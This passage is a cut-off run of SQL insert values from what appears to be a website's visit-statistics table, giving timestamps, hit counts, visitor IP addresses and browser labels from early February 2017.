0,'163.172.64.247','other'),(86846,1486223294,1,0,1,0,'66.249.65.61',''),(86847,1486225202,1,1,0,0,'82.145.222.63','other'),(86848,1486225274,1,1,0,0,'82.145.222.63','chrome'),(86849,1486225275,1,1,0,0,'82.145.222.63','opera'),(86850,1486226519,1,1,0,0,'94.179.120.229','firefox'),(86851,1486226637,1,1,0,0,'180.76.15.157','other'),(86852,1486228161,1,1,0,0,'163.172.64.244','other'),(86853,1486228604,4,4,0,0,'93.180.64.220','other'),(86854,1486229906,1,0,1,0,'66.249.64.61',''),(86855,1486230156,1,1,0,0,'93.180.64.220','other'),(86856,1486233639,1,0,1,0,'66.249.64.187',''),(86857,1486234907,1,1,0,0,'207.46.13.55','other'),(86858,1486237430,2,0,2,0,'66.249.64.183',''),(86859,1486239613,2,2,0,0,'130.193.50.34','other'),(86860,1486239673,1,1,0,0,'91.196.178.65','firefox'),(86861,1486239985,1,1,0,0,'141.8.183.19','other'),(86862,1486239989,2,2,0,0,'130.193.51.19','other'),(86863,1486243311,1,0,1,0,'66.249.64.179',''),(86864,1486245040,2,2,0,0,'130.193.50.34','other'),(86865,1486248996,1,1,0,0,'207.46.13.152','other'),(86866,1486253931,1,1,0,0,'40.77.167.56','other'),(86867,1486254415,2,0,2,0,'66.249.64.179',''),(86868,1486259517,1,1,0,0,'130.193.50.34','other'),(86869,1486260543,1,1,0,0,'178.255.215.94','other'),(86870,1486260760,1,1,0,0,'141.8.183.25','other'),(86871,1486261136,1,1,0,0,'141.8.142.175','other'),(86872,1486261173,1,1,0,0,'130.193.50.34','other'),(86873,1486264431,1,1,0,0,'130.193.50.34','other'),(86874,1486264875,1,0,1,0,'66.249.64.183',''),(86875,1486265609,1,0,1,0,'68.180.228.230',''),(86876,1486266855,2,0,2,0,'66.249.64.179',''),(86877,1486268316,2,0,2,0,'66.249.64.183',''),(86878,1486268440,1,0,1,0,'66.249.64.179',''),(86879,1486272283,1,0,1,0,'66.249.64.183',''),(86880,1486273424,1,1,0,0,'40.77.167.56','other'),(86881,1486273774,1,1,0,0,'163.172.64.228','other'),(86882,1486275544,1,1,0,0,'163.172.64.223','other'),(86883,1486279720,1,1,0,0,'66.249.93.156','chrome'),(86884,1486280726,1,1,0,0,'91.232.158.8','chrome'),(86885,1486281080,1,1,0,0,'163.172.64.231','other'),(86886,1486281679,1,1,0,0,'91.232.158.8','chrome'),(86887,1486284106,1,1,0,0,'163.172.64.228','other'),(86888,1486285038,1,0,1,0,'66.249.64.187',''),(86889,1486285329,1,1,0,0,'5.255.253.47','other'),(86890,1486285337,1,1,0,0,'141.8.184.11','other'),(86891,1486285426,23,23,0,0,'78.46.21.97','other'),(86892,1486286330,23,23,0,0,'78.46.21.97','other'),(86893,1486286517,1,0,1,0,'66.249.64.179',''),(86894,1486286814,1,0,1,0,'66.249.64.59',''),(86895,1486287233,11,11,0,0,'78.46.21.97','other'),(86896,1486288378,1,1,0,0,'66.249.93.205','chrome'),(86897,1486288575,1,1,0,0,'163.172.64.236','other'),(86898,1486290768,1,1,0,0,'163.172.64.224','other'),(86899,1486290850,1,1,0,0,'130.193.51.14','other'),(86900,1486290918,1,0,1,0,'66.249.64.187',''),(86901,1486292038,1,0,1,0,'68.180.229.62',''),(86902,1486292165,1,0,1,0,'66.249.64.179',''),(86903,1486292669,1,0,1,0,'66.249.64.59',''),(86904,1486292713,1,0,1,0,'68.180.228.230',''),(86905,1486293148,1,0,1,0,'66.249.64.187',''),(86906,1486293645,1,0,1,0,'66.249.64.179',''),(86907,1486293940,1,1,0,0,'66.249.64.61','chrome'),(86908,1486293960,1,1,0,0,'66.249.64.179','chrome'),(86909,1486294563,1,1,0,0,'207.46.13.172','other'),(86910,1486294645,1,1,0,0,'178.154.189.31','other'),(86911,1486294649,1,1,0,0,'130.193.51.19','other'),(86912,1486294653,1,1,0,0,'141.8.142.25','other'),(86913,1486294657,1,1,0,0,'141.8.142.155','other'),(86914,1486294661,1,1,0,0,'130.193.51.45','other'),(86915,1486294713,1,1,0,0,'62.212.73.211','other'),(86916,1486295114,1,1,0,0,'207.46.13.55','other'),(86917,1486296875,1,0,1,0,'66.249.64.183',''),(86918,1486297317,1,1,0,0,'91.196.178.38','firefox'),(86919,1486298953,1,0,1,0,'66.249.64.59',''),(86920,1486300013,1,1,0,0,'217.69.133.233','other'),(86921,1486302577,1,1,0,0,'91.196.178.40','chrome'),(86922,1486302626,1,1,0,0,'163.172.64.247','other'),(86923,1486303240,22,22,0,0,'78.46.21.97','other'),(86924,1486304142,22,22,0,0,'78.46.21.97','other'),(86925,1486304230,1,1,0,0,'37.55.226.132','chrome'),(86926,1486304234,1,1,0,0,'130.193.50.34','other'),(86927,1486305044,22,22,0,0,'78.46.21.97','other'),(86928,1486305893,1,1,0,0,'180.76.15.139','other'),(86929,1486305946,22,22,0,0,'78.46.21.97','other'),(86930,1486306546,1,0,1,0,'66.249.64.187',''),(86931,1486306689,1,0,1,0,'66.249.64.179',''),(86932,1486306848,22,22,0,0,'78.46.21.97','other'),(86933,1486307065,1,1,0,0,'163.172.64.246','other'),(86934,1486307750,20,20,0,0,'78.46.21.97','other'),(86935,1486308526,1,0,1,0,'66.249.64.187',''),(86936,1486308944,1,1,0,0,'66.249.64.61','chrome'),(86937,1486308948,1,1,0,0,'66.249.64.179','chrome'),(86938,1486309041,1,0,1,0,'66.249.64.59',''),(86939,1486309911,1,1,0,0,'180.76.15.134','other'),(86940,1486310361,1,0,1,0,'66.249.64.187',''),(86941,1486312714,1,1,0,0,'163.172.64.220','other'),(86942,1486313245,1,0,1,0,'66.249.64.183',''),(86943,1486313551,1,0,1,0,'66.249.64.187',''),(86944,1486313562,1,0,1,0,'66.249.64.179',''),(86945,1486314411,2,0,2,0,'66.249.64.183',''),(86946,1486315255,1,0,1,0,'66.249.64.179',''),(86947,1486315808,1,1,0,0,'83.21.248.80','chrome'),(86948,1486315902,1,0,1,0,'66.249.64.183',''),(86949,1486316729,1,0,1,0,'66.249.64.187',''),(86950,1486317118,1,1,0,0,'8.29.198.39','other'),(86951,1486317519,1,1,0,0,'163.172.64.224','other'),(86952,1486317797,1,1,0,0,'66.249.64.61','chrome'),(86953,1486317854,1,1,0,0,'207.46.13.152','other'),(86954,1486318263,15,15,0,0,'91.196.178.98','chrome'),(86955,1486318523,3,0,3,0,'66.249.64.183',''),(86956,1486318619,1,0,1,0,'66.249.64.57',''),(86957,1486318701,1,1,0,0,'66.102.9.136','chrome'),(86958,1486320191,1,0,1,0,'66.249.64.187',''),(86959,1486320308,23,23,0,0,'78.46.21.97','other'),(86960,1486320850,1,0,1,0,'66.249.64.59',''),(86961,1486321009,1,1,0,0,'82.145.222.207','other'),(86962,1486321212,22,22,0,0,'78.46.21.97','other'),(86963,1486322059,9,9,0,0,'91.196.178.98','chrome'),(86964,1486322114,22,22,0,0,'78.46.21.97','other'),(86965,1486323016,22,22,0,0,'78.46.21.97','other'),(86966,1486323479,1,0,1,0,'66.249.64.183',''),(86967,1486323918,22,22,0,0,'78.46.21.97','other'),(86968,1486324820,19,19,0,0,'78.46.21.97','other'),(86969,1486325209,1,0,1,0,'66.249.64.179',''),(86970,1486325483,1,0,1,0,'66.249.64.183',''),(86971,1486325908,2,0,2,0,'66.249.64.187',''),(86972,1486326575,1,0,1,0,'66.249.64.61',''),(86973,1486327288,1,0,1,0,'66.249.64.187',''),(86974,1486327587,1,1,0,0,'163.172.64.192','other'),(86975,1486328741,1,0,1,0,'66.249.64.61',''),(86976,1486329234,1,1,0,0,'163.172.73.28','other'),(86977,1486329635,1,1,0,0,'185.26.180.184','opera'),(86978,1486329964,1,1,0,0,'82.145.222.252','opera'),(86979,1486330771,1,0,1,0,'68.180.228.230',''),(86980,1486330841,1,0,1,0,'66.249.64.57',''),(86981,1486331025,1,1,0,0,'130.193.51.19','other'),(86982,1486332182,21,21,0,0,'78.46.21.97','other'),(86983,1486333083,22,22,0,0,'78.46.21.97','other'),(86984,1486333090,1,0,1,0,'66.249.64.183',''),(86985,1486333139,1,1,0,0,'207.46.13.55','other'),(86986,1486333337,1,1,0,0,'163.172.64.249','other'),(86987,1486333985,22,22,0,0,'78.46.21.97','other'),(86988,1486334887,22,22,0,0,'78.46.21.97','other'),(86989,1486335492,1,0,1,0,'66.249.64.187',''),(86990,1486335789,22,22,0,0,'78.46.21.97','other'),(86991,1486335866,1,1,0,0,'95.135.241.80','chrome'),(86992,1486336673,1,1,0,0,'95.221.251.150','chrome'),(86993,1486336691,20,20,0,0,'78.46.21.97','other'),(86994,1486337557,1,1,0,0,'163.172.73.28','other'),(86995,1486337562,1,1,0,0,'66.249.64.183','chrome'),(86996,1486337662,2,0,2,0,'66.249.64.187',''),(86997,1486338460,1,1,0,0,'66.249.64.61','chrome'),(86998,1486339078,2,0,2,0,'66.249.64.187',''),(86999,1486339495,1,1,0,0,'180.76.15.144','other'),(87000,1486340115,2,2,0,0,'207.46.13.172','other'),(87001,1486340579,1,1,0,0,'163.172.64.193','other'),(87002,1486340647,2,1,1,0,'66.249.64.187',''),(87003,1486340861,1,0,1,0,'68.180.228.230',''),(87004,1486341032,2,0,2,0,'66.249.64.179',''),(87005,1486343162,1,0,1,0,'66.249.64.57',''),(87006,1486344123,1,0,1,0,'66.249.64.61',''),(87007,1486344432,1,0,1,0,'66.249.64.187',''),(87008,1486344764,1,1,0,0,'95.84.202.212','msie'),(87009,1486344955,1,1,0,0,'207.46.13.172','other'),(87010,1486345311,1,0,1,0,'66.249.64.179',''),(87011,1486345615,1,1,0,0,'66.249.64.57','chrome'),(87012,1486345936,1,0,1,0,'66.249.64.59',''),(87013,1486346807,1,1,0,0,'66.249.64.59','chrome'),(87014,1486346845,1,1,0,0,'163.172.73.28','other'),(87015,1486346895,1,0,1,0,'66.249.64.57',''),(87016,1486349126,1,1,0,0,'176.195.124.156','chrome'),(87017,1486349266,1,0,1,0,'66.249.64.183',''),(87018,1486350279,1,0,1,0,'66.249.64.183',''),(87019,1486350395,1,1,0,0,'66.249.64.59','chrome'),(87020,1486352329,1,0,1,0,'66.249.64.57',''),(87021,1486352360,1,0,1,0,'66.249.64.187',''),(87022,1486355080,1,1,0,0,'207.46.13.152','other'),(87023,1486355366,9,9,0,0,'91.196.178.98','chrome'),(87024,1486355567,2,1,1,0,'66.249.64.57',''),(87025,1486356447,2,0,2,0,'66.249.64.187',''),(87026,1486356789,1,1,0,0,'163.172.64.247','other'),(87027,1486357496,1,0,1,0,'66.249.64.183',''),(87028,1486358298,2,0,2,0,'68.180.228.230',''),(87029,1486359396,1,1,0,0,'188.32.31.78','firefox'),(87030,1486360714,1,0,1,0,'66.249.64.179',''),(87031,1486361173,1,1,0,0,'91.196.178.65','firefox'),(87032,1486361221,1,0,1,0,'66.249.64.187',''),(87033,1486361319,1,1,0,0,'138.197.75.231','other'),(87034,1486361505,3,3,0,0,'37.73.254.156','chrome'),(87035,1486361639,1,0,1,0,'66.249.64.183',''),(87036,1486361805,1,0,1,0,'66.249.64.179',''),(87037,1486362889,1,1,0,0,'66.249.93.89','chrome'),(87038,1486364090,1,1,0,0,'91.124.41.59','chrome'),(87039,1486364433,1,1,0,0,'37.52.23.154','chrome'),(87040,1486365792,1,1,0,0,'66.249.93.204','chrome'),(87041,1486366078,1,1,0,0,'91.196.178.65','chrome'),(87042,1486366220,1,1,0,0,'130.180.216.146','firefox'),(87043,1486366264,1,1,0,0,'46.200.58.52','chrome'),(87044,1486367090,1,1,0,0,'91.196.178.135','firefox'),(87045,1486367341,1,1,0,0,'207.46.13.152','other'),(87046,1486367409,1,1,0,0,'66.249.64.59','chrome'),(87047,1486368598,1,0,1,0,'66.249.64.187',''),(87048,1486369765,1,1,0,0,'207.46.13.152','other'),(87049,1486369807,1,0,1,0,'66.249.64.183',''),(87050,1486370318,1,1,0,0,'95.133.31.113','chrome'),(87051,1486370328,1,1,0,0,'141.8.132.10','other'),(87052,1486370407,1,1,0,0,'37.54.19.44','chrome'),(87053,1486371413,2,2,0,0,'91.196.178.66','firefox'),(87054,1486371641,1,1,0,0,'37.55.150.182','chrome'),(87055,1486371730,1,1,0,0,'207.46.13.55','other'),(87056,1486372024,1,1,0,0,'93.74.212.147','firefox'),(87057,1486372331,1,1,0,0,'163.172.64.180','other'),(87058,1486372652,1,0,1,0,'66.249.64.179',''),(87059,1486373064,1,1,0,0,'91.196.178.66','firefox'),(87060,1486373133,1,1,0,0,'91.196.177.26','chrome'),(87061,1486373364,1,0,1,0,'66.249.64.183',''),(87062,1486373817,1,1,0,0,'91.196.178.135','firefox'),(87063,1486373943,1,0,1,0,'66.249.64.59',''),(87064,1486373954,1,1,0,0,'66.249.64.183','chrome'),(87065,1486374034,1,1,0,0,'66.249.64.57','chrome'),(87066,1486374460,1,1,0,0,'37.54.19.44','chrome'),(87067,1486374513,1,1,0,0,'46.211.6.252','chrome'),(87068,1486374891,1,1,0,0,'178.137.83.166','chrome'),(87069,1486375747,1,0,1,0,'66.249.64.187',''),(87070,1486375861,1,0,1,0,'66.249.64.183',''),(87071,1486376013,1,1,0,0,'91.196.178.72','chrome'),(87072,1486376119,1,0,1,0,'66.249.64.179',''),(87073,1486376443,1,1,0,0,'91.196.178.38','firefox'),(87074,1486376523,1,1,0,0,'195.114.121.72','msie'),(87075,1486376526,1,1,0,0,'94.179.63.59','firefox'),(87076,1486376572,1,1,0,0,'91.196.178.131','chrome'),(87077,1486376962,1,1,0,0,'91.196.178.66','firefox'),(87078,1486377145,2,2,0,0,'23.101.61.176','other'),(87079,1486377475,1,1,0,0,'91.196.178.165','chrome'),(87080,1486378105,1,0,1,0,'66.249.64.187',''),(87081,1486378281,1,1,0,0,'46.200.58.243','chrome'),(87082,1486378413,1,1,0,0,'66.249.93.91','chrome'),(87083,1486378509,1,1,0,0,'91.196.178.67','firefox'),(87084,1486378689,1,1,0,0,'141.8.142.61','other'),(87085,1486378751,1,1,0,0,'141.8.183.25','other'),(87086,1486378858,1,1,0,0,'163.172.64.226','other'),(87087,1486378988,1,1,0,0,'207.46.13.152','other'),(87088,1486379068,1,1,0,0,'91.196.178.70','firefox'),(87089,1486379381,1,0,1,0,'66.249.64.183',''),(87090,1486379395,1,1,0,0,'91.196.178.69','chrome'),(87091,1486380246,1,1,0,0,'91.196.178.72','chrome'),(87092,1486380252,1,1,0,0,'91.236.184.132','firefox'),(87093,1486380477,1,1,0,0,'91.196.178.165','chrome'),(87094,1486380872,1,1,0,0,'207.46.13.28','other'),(87095,1486381184,1,1,0,0,'91.196.177.26','chrome'),(87096,1486381368,2,0,2,0,'66.249.64.183',''),(87097,1486381456,1,1,0,0,'163.172.64.182','other'),(87098,1486381545,1,1,0,0,'163.172.64.236','other'),(87099,1486381724,1,1,0,0,'37.52.137.248','chrome'),(87100,1486382264,1,1,0,0,'37.203.31.135','chrome'),(87101,1486382664,1,1,0,0,'91.196.178.72','other'),(87102,1486382745,1,1,0,0,'130.193.51.19','other'),(87103,1486382747,1,1,0,0,'93.158.152.84','other'),(87104,1486383348,1,1,0,0,'37.203.31.135','chrome'),(87105,1486383455,1,1,0,0,'91.196.178.71','chrome'),(87106,1486384279,5,5,0,0,'93.180.64.220','other'),(87107,1486384481,1,0,1,0,'66.249.64.187',''),(87108,1486384569,1,0,1,0,'66.249.64.61',''),(87109,1486384871,1,1,0,0,'91.236.184.19','firefox'),(87110,1486385102,1,1,0,0,'94.179.44.163','chrome'),(87111,1486385107,3,3,0,0,'91.196.178.66','firefox'),(87112,1486385135,7,7,0,0,'46.229.168.69','other'),(87113,1486385216,3,3,0,0,'46.229.168.66','other'),(87114,1486385306,1,1,0,0,'46.229.168.65','other'),(87115,1486385354,3,3,0,0,'46.229.168.75','other'),(87116,1486385913,5,5,0,0,'93.180.64.220','other'),(87117,1486385970,1,1,0,0,'77.52.196.122','chrome'),(87118,1486386253,1,1,0,0,'163.172.64.193','other'),(87119,1486386730,1,1,0,0,'91.236.184.19','firefox'),(87120,1486386735,1,1,0,0,'37.52.17.236','chrome'),(87121,1486386763,1,1,0,0,'130.193.50.34','other'),(87122,1486386969,1,1,0,0,'163.172.64.245','other'),(87123,1486387203,1,1,0,0,'91.196.178.72','firefox'),(87124,1486387842,1,1,0,0,'141.8.142.175','other'),(87125,1486387885,7,7,0,0,'185.89.101.221','chrome'),(87126,1486387901,1,1,0,0,'94.179.11.100','chrome'),(87127,1486388239,1,0,1,0,'66.249.64.57',''),(87128,1486388417,1,1,0,0,'91.196.177.26','chrome'),(87129,1486388445,1,1,0,0,'91.196.178.66','firefox'),(87130,1486389522,1,1,0,0,'91.196.178.72','firefox'),(87131,1486390539,1,1,0,0,'91.196.178.71','chrome'),(87132,1486391040,1,0,1,0,'66.249.64.59',''),(87133,1486391210,1,1,0,0,'95.132.23.86','firefox'),(87134,1486391546,2,0,2,0,'66.249.64.179',''),(87135,1486391692,1,0,1,0,'66.249.64.183',''),(87136,1486392521,1,0,1,0,'66.249.64.179',''),(87137,1486392529,1,1,0,0,'46.211.154.98','chrome'),(87138,1486392532,1,1,0,0,'37.52.23.154','chrome'),(87139,1486393080,1,1,0,0,'217.77.210.115','firefox'),(87140,1486393097,1,1,0,0,'163.172.64.225','other'),(87141,1486393098,1,1,0,0,'130.193.50.34','other'),(87142,1486393141,1,1,0,0,'94.179.74.90','firefox'),(87143,1486393928,1,1,0,0,'163.172.64.226','other'),(87144,1486393995,1,0,1,0,'66.249.64.179',''),(87145,1486394399,1,1,0,0,'91.196.178.70','firefox'),(87146,1486394531,1,1,0,0,'91.196.178.67','chrome'),(87147,1486394564,1,1,0,0,'37.52.23.154','chrome'),(87148,1486394876,1,1,0,0,'195.154.181.162','chrome'),(87149,1486396686,1,1,0,0,'163.172.64.225','other'),(87150,1486396811,1,0,1,0,'66.249.64.179',''),(87151,1486398350,1,0,1,0,'66.249.64.187',''),(87152,1486399184,1,1,0,0,'207.46.13.152','other'),(87153,1486399542,1,1,0,0,'163.172.64.217','other'),(87154,1486399667,1,0,1,0,'66.249.64.187',''),(87155,1486399890,1,0,1,0,'66.249.64.179',''),(87156,1486400660,1,1,0,0,'91.196.178.164','chrome'),(87157,1486400951,1,1,0,0,'91.196.178.99','chrome'),(87158,1486402299,3,3,0,0,'130.193.50.34','other'),(87159,1486402442,1,1,0,0,'141.8.142.25','other'),(87160,1486402455,1,1,0,0,'141.8.142.61','other'),(87161,1486402563,1,1,0,0,'141.8.142.175','other'),(87162,1486402582,1,1,0,0,'141.8.183.25','other'),(87163,1486403011,1,1,0,0,'141.8.183.19','other'),(87164,1486403853,1,1,0,0,'141.0.13.244','other'),(87165,1486403907,1,1,0,0,'94.179.101.83','firefox'),(87166,1486404010,1,1,0,0,'141.8.132.41','other'),(87167,1486404016,3,3,0,0,'141.8.142.61','other'),(87168,1486404028,1,1,0,0,'91.196.178.71','firefox'),(87169,1486404158,2,2,0,0,'141.8.132.10','other'),(87170,1486404161,5,5,0,0,'130.193.50.34','other'),(87171,1486404164,1,1,0,0,'141.8.183.19','other'),(87172,1486404175,1,1,0,0,'93.158.152.84','other'),(87173,1486404178,2,2,0,0,'141.8.142.58','other'),(87174,1486404181,4,4,0,0,'130.193.51.19','other'),(87175,1486404188,7,7,0,0,'141.8.142.175','other'),(87176,1486404201,4,4,0,0,'141.8.183.25','other'),(87177,1486404895,1,1,0,0,'31.41.70.9','chrome'),(87178,1486405165,1,1,0,0,'180.76.15.29','other'),(87179,1486405487,1,0,1,0,'66.249.64.179',''),(87180,1486405822,1,1,0,0,'141.8.183.25','other'),(87181,1486406044,1,0,1,0,'66.249.64.183',''),(87182,1486406357,1,1,0,0,'91.196.178.35','chrome'),(87183,1486406750,1,1,0,0,'91.196.178.165','firefox'),(87184,1486408164,1,1,0,0,'141.8.142.175','other'),(87185,1486408847,1,1,0,0,'195.154.181.162','chrome'),(87186,1486408856,2,2,0,0,'130.193.50.34','other'),(87187,1486409401,1,0,1,0,'66.249.64.59',''),(87188,1486409586,1,1,0,0,'141.8.183.25','other'),(87189,1486409701,1,0,1,0,'66.249.64.183',''),(87190,1486410406,1,1,0,0,'91.196.178.35','chrome'),(87191,1486410872,3,3,0,0,'141.8.142.175','other'),(87192,1486410955,1,1,0,0,'141.8.183.25','other'),(87193,1486410970,3,0,3,0,'66.249.64.179',''),(87194,1486410972,1,0,1,0,'66.249.64.187',''),(87195,1486411419,2,2,0,0,'130.193.50.34','other'),(87196,1486411431,1,1,0,0,'46.201.112.32','firefox'),(87197,1486411958,1,1,0,0,'130.193.51.19','other'),(87198,1486412525,1,1,0,0,'163.172.64.254','other'),(87199,1486413020,2,2,0,0,'130.193.50.34','other'),(87200,1486413341,1,1,0,0,'66.249.64.57','chrome'),(87201,1486414017,1,1,0,0,'178.255.215.94','other'),(87202,1486414091,3,3,0,0,'130.193.50.34','other'),(87203,1486414215,2,2,0,0,'141.8.142.175','other'),(87204,1486414974,1,0,1,0,'66.249.64.61',''),(87205,1486415165,1,1,0,0,'130.193.50.34','other'),(87206,1486415260,1,1,0,0,'207.46.13.55','other'),(87207,1486415841,3,3,0,0,'141.8.142.175','other'),(87208,1486416171,2,2,0,0,'130.193.50.34','other'),(87209,1486417096,3,3,0,0,'130.193.50.34','other'),(87210,1486417142,1,0,1,0,'66.249.64.187',''),(87211,1486417150,1,0,1,0,'66.249.64.179',''),(87212,1486417441,3,3,0,0,'141.8.142.175','other'),(87213,1486417520,1,1,0,0,'163.172.64.252','other'),(87214,1486418450,1,1,0,0,'163.172.64.227','other'),(87215,1486418607,1,1,0,0,'163.172.64.183','other'),(87216,1486419708,1,1,0,0,'163.172.64.245','other'),(87217,1486419934,2,2,0,0,'130.193.50.34','other'),(87218,1486420009,2,2,0,0,'141.8.142.175','other'),(87219,1486420870,1,1,0,0,'130.193.50.34','other'),(87220,1486420890,1,0,1,0,'66.249.64.57',''),(87221,1486420941,1,0,1,0,'66.249.64.59',''),(87222,1486421698,2,2,0,0,'207.46.13.152','other'),(87223,1486424132,2,0,2,0,'66.249.64.187',''),(87224,1486424411,1,1,0,0,'163.172.64.242','other'),(87225,1486426922,1,1,0,0,'95.85.63.40','other'),(87226,1486427522,1,1,0,0,'104.214.111.78','other'),(87227,1486428112,1,1,0,0,'95.85.63.40','other'),(87228,1486428297,1,1,0,0,'66.249.64.187','chrome'),(87229,1486428302,1,1,0,0,'66.249.64.61','chrome'),(87230,1486428744,1,0,1,0,'66.249.64.59',''),(87231,1486429957,1,1,0,0,'141.8.142.175','other'),(87232,1486429960,1,1,0,0,'93.158.152.51','other'),(87233,1486430025,1,0,1,0,'66.249.64.183',''),(87234,1486430326,1,1,0,0,'207.46.13.152','other'),(87235,1486431126,1,0,1,0,'66.249.64.61',''),(87236,1486431502,1,1,0,0,'207.46.13.28','other'),(87237,1486432317,1,0,1,0,'66.249.64.183',''),(87238,1486433532,1,1,0,0,'176.195.174.105','msie'),(87239,1486435760,1,0,1,0,'68.180.229.62',''),(87240,1486436079,1,0,1,0,'66.249.64.187',''),(87241,1486436560,1,0,1,0,'66.249.64.57',''),(87242,1486439488,1,0,1,0,'66.249.64.183',''),(87243,1486439761,1,1,0,0,'163.172.64.181','other'),(87244,1486441706,1,1,0,0,'180.76.15.15','other'),(87245,1486442350,1,1,0,0,'66.249.64.183','chrome'),(87246,1486443758,1,1,0,0,'66.249.64.57','chrome'),(87247,1486443762,1,1,0,0,'66.249.64.187','chrome'),(87248,1486444885,1,0,1,0,'66.249.64.187',''),(87249,1486445558,1,0,1,0,'66.249.64.183',''),(87250,1486445997,1,1,0,0,'157.55.39.49','other'),(87251,1486447957,1,1,0,0,'91.196.178.67','firefox'),(87252,1486448784,1,0,1,0,'66.249.64.187',''),(87253,1486449032,1,0,1,0,'66.249.64.183',''),(87254,1486449740,1,1,0,0,'37.52.23.154','chrome'),(87255,1486449758,2,2,0,0,'91.196.178.66','firefox'),(87256,1486450012,1,1,0,0,'66.249.93.93','chrome'),(87257,1486450637,1,1,0,0,'91.196.178.67','firefox'),(87258,1486450737,1,1,0,0,'91.124.22.10','chrome'),(87259,1486450968,1,1,0,0,'157.55.39.105','other'),(87260,1486451135,1,0,1,0,'66.249.64.179',''),(87261,1486453165,1,1,0,0,'207.46.13.55','other'),(87262,1486453411,1,1,0,0,'91.196.178.67','firefox'),(87263,1486454042,1,1,0,0,'195.49.151.99','chrome'),(87264,1486454103,1,1,0,0,'91.196.178.132','firefox'),(87265,1486454389,1,1,0,0,'95.135.90.252','chrome'),(87266,1486455068,1,1,0,0,'180.76.15.161','other'),(87267,1486455341,1,0,1,0,'66.249.64.59',''),(87268,1486455788,1,1,0,0,'163.172.64.246','other'),(87269,1486455794,1,0,1,0,'66.249.64.183',''),(87270,1486456207,1,1,0,0,'91.196.178.66','firefox'),(87271,1486456290,1,1,0,0,'130.193.50.34','other'),(87272,1486456583,1,1,0,0,'141.8.142.175','other'),(87273,1486457444,2,2,0,0,'130.193.50.34','other'),(87274,1486457714,1,1,0,0,'46.200.218.18','firefox'),(87275,1486457730,1,1,0,0,'207.46.13.152','other'),(87276,1486458264,1,1,0,0,'37.53.140.27','firefox'),(87277,1486458526,1,1,0,0,'178.94.6.147','chrome'),(87278,1486458595,2,2,0,0,'130.193.50.34','other'),(87279,1486458755,2,2,0,0,'141.8.183.25','other'),(87280,1486459087,3,3,0,0,'141.8.142.175','other'),(87281,1486459261,1,0,1,0,'66.249.64.61',''),(87282,1486459710,1,0,1,0,'66.249.64.179',''),(87283,1486459987,1,1,0,0,'82.207.38.91','chrome'),(87284,1486459995,1,1,0,0,'5.255.253.54','other'),(87285,1486460080,1,1,0,0,'94.179.58.112','opera'),(87286,1486460105,1,1,0,0,'91.196.178.163','chrome'),(87287,1486460929,1,1,0,0,'91.196.179.134','chrome'),(87288,1486461101,1,1,0,0,'94.179.43.184','firefox'),(87289,1486461122,1,1,0,0,'130.193.50.34','other'),(87290,1486461264,1,0,1,0,'66.249.64.183',''),(87291,1486461268,1,0,1,0,'66.249.64.179',''),(87292,1486462309,2,2,0,0,'130.193.50.34','other'),(87293,1486462846,1,1,0,0,'91.196.178.72','firefox'),(87294,1486462938,1,0,1,0,'66.249.64.187',''),(87295,1486463212,1,1,0,0,'91.196.178.67','chrome'),(87296,1486463480,1,1,0,0,'91.196.178.34','chrome'),(87297,1486464380,1,1,0,0,'130.180.218.191','firefox'),(87298,1486464435,1,1,0,0,'46.175.144.19','chrome'),(87299,1486464665,1,1,0,0,'46.201.186.79','opera'),(87300,1486464732,1,1,0,0,'91.196.177.46','chrome'),(87301,1486465441,1,1,0,0,'163.172.64.216','other'),(87302,1486465997,2,2,0,0,'91.196.177.46','firefox'),(87303,1486466007,1,1,0,0,'92.113.31.173','chrome'),(87304,1486467164,1,0,1,0,'66.249.64.57',''),(87305,1486467211,1,1,0,0,'91.196.178.66','firefox'),(87306,1486467315,1,0,1,0,'66.249.64.183',''),(87307,1486467383,1,1,0,0,'37.53.140.27','firefox'),(87308,1486467406,1,1,0,0,'91.196.177.26','chrome'),(87309,1486467507,1,1,0,0,'91.196.178.34','firefox'),(87310,1486467577,1,1,0,0,'130.193.50.34','other'),(87311,1486467993,1,1,0,0,'141.8.142.58','other'),(87312,1486469053,1,1,0,0,'91.196.178.169','chrome'),(87313,1486469182,1,1,0,0,'178.92.160.255','chrome'),(87314,1486469245,1,1,0,0,'180.76.15.155','other'),(87315,1486469346,1,1,0,0,'37.187.111.153','other'),(87316,1486469900,1,1,0,0,'141.8.183.25','other'),(87317,1486470390,1,1,0,0,'40.77.167.7','other'),(87318,1486471004,1,1,0,0,'91.196.177.46','firefox'),(87319,1486471438,1,1,0,0,'40.77.167.7','other'),(87320,1486471559,1,1,0,0,'207.46.13.55','other'),(87321,1486472134,1,0,1,0,'66.249.64.179',''),(87322,1486472401,1,1,0,0,'163.172.64.234','other'),(87323,1486472644,1,1,0,0,'178.94.220.97','chrome'),(87324,1486472931,1,1,0,0,'37.53.140.27','firefox'),(87325,1486473001,2,2,0,0,'141.8.183.25','other'),(87326,1486473337,1,1,0,0,'130.193.51.19','other'),(87327,1486473358,1,1,0,0,'141.8.183.19','other'),(87328,1486473376,1,1,0,0,'93.158.152.84','other'),(87329,1486473381,1,1,0,0,'141.8.142.67','other'),(87330,1486473389,1,1,0,0,'141.8.142.25','other'),(87331,1486473396,1,1,0,0,'141.8.142.58','other'),(87332,1486473400,1,1,0,0,'130.193.50.6','other'),(87333,1486473547,1,1,0,0,'91.196.178.98','chrome'),(87334,1486473839,1,1,0,0,'82.207.49.122','chrome'),(87335,1486473955,1,1,0,0,'91.196.178.39','firefox'),(87336,1486474012,1,0,1,0,'68.180.228.230',''),(87337,1486474274,1,1,0,0,'91.196.178.132','firefox'),(87338,1486474463,1,1,0,0,'163.172.73.28','other'),(87339,1486474660,1,1,0,0,'141.8.142.175','other'),(87340,1486474932,1,1,0,0,'193.19.152.77','firefox'),(87341,1486474958,2,2,0,0,'141.8.183.25','other'),(87342,1486475281,1,1,0,0,'91.196.178.39','firefox'),(87343,1486475375,1,1,0,0,'130.193.51.19','other'),(87344,1486475474,1,0,1,0,'66.249.64.59',''),(87345,1486475844,2,2,0,0,'130.193.50.34','other'),(87346,1486476055,1,1,0,0,'37.53.229.30','firefox'),(87347,1486476093,1,1,0,0,'91.196.178.66','firefox'),(87348,1486476151,2,2,0,0,'23.101.61.176','other'),(87349,1486477040,2,2,0,0,'130.193.51.19','other'),(87350,1486477043,2,2,0,0,'141.8.183.25','other'),(87351,1486477051,1,1,0,0,'130.193.50.34','other'),(87352,1486477211,1,1,0,0,'95.221.194.110','chrome'),(87353,1486477518,1,1,0,0,'141.8.142.175','other'),(87354,1486478662,1,1,0,0,'37.55.77.114','chrome'),(87355,1486478684,1,1,0,0,'82.145.220.77','opera'),(87356,1486478734,1,